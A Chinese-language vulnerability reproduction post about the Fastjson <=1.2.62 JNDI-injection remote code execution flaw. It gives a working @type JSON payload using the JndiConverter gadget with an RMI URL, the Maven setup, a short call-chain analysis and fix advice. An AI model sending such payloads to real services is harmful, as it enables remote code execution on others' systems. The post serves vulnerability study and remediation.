Fastjson <=1.2.62 远程代码执行-漏洞复现
2020-02-23 11:30
555 查看
影响范围:
Fastjson<=1.2.62
需要开启autotype
poc:
String text1 = "{\"@type\":\"org.apache.xbean.propertyeditor.JndiConverter\",\"AsText\":\"rmi://127.0.0.1:1099/exploit\"}";
pom:
<dependency> <groupId>com.alibaba</groupId> <artifactId>fastjson</artifactId> <version>1.2.62</version> </dependency> <dependency> <groupId>commons-collections</groupId> <artifactId>commons-collections</artifactId> <version>3.1</version> </dependency>
tips:这里需要另外导入jar包才能测试
该黑名单主要来自于jackson-CVE-2020-8840
https://nvd.nist.gov/vuln/detail/CVE-2020-8840
漏洞复现:
漏洞分析
这里明显存在jndi注入,但是toObjectImpl不满足fastjson调用规则,因此查看其父类函数
其父类中在toObject函数中调用了它,但是仍然不满足调用条件,因此继续溯源
可以看到在setAsText函数中调用了toObject函数,并且set满足调用规则,确定Astext属性,因此payload即打
github环境:
https://github.com/Wfzsec/FastJson1.2.62-RCE
修复建议:
1.关了autotype,用白名单(推荐)
2.升级jdk(不太现实)
相关文章推荐
- Fastjson存在远程代码执行高危安全漏洞
- Fastjson 爆出远程代码执行高危漏洞,更新版本已修复
- Fastjson 爆出远程代码执行高危漏洞,更新版本已修复
- Fastjson 爆出远程代码执行高危漏洞
- CVE-2017-8464 LNK文件(快捷方式)远程代码执行漏洞复现
- WinRAR远程代码执行漏洞复现(CVE-2018-20250)
- Office CVE-2017-8570远程代码执行漏洞复现
- sys远程代码执行漏洞复现
- shellshock破壳远程命令执行漏洞复现通过web的方式进行web执行远程代码
- 「漏洞预警」Apache Flink 任意 Jar 包上传导致远程代码执行漏洞复现
- Struts2/XWork < 2.2.0远程执行任意代码漏洞分析及修补[转自Neeao's Blog]
- WebView远程代码执行漏洞学习并复现
- WebLogic 任意文件上传远程代码执行_CVE-2018-2894漏洞复现
- phpliteadmin <= 1.9.3 远程php代码执行漏洞测试
- Palo Alto防火墙远程代码执行漏洞复现
- Apache Solr Velocity模板远程代码执行——kali搭建漏洞复现
- WebLogic 任意文件上传远程代码执行_CVE-2018-2894漏洞复现
- Adboe Flash远程代码执行_CVE-2018-4878漏洞复现
- Office CVE-2017-8570 远程代码执行漏洞复现
- 【渗透测试】ApacheTomcat 远程代码执行漏洞复现CVE-2017-12615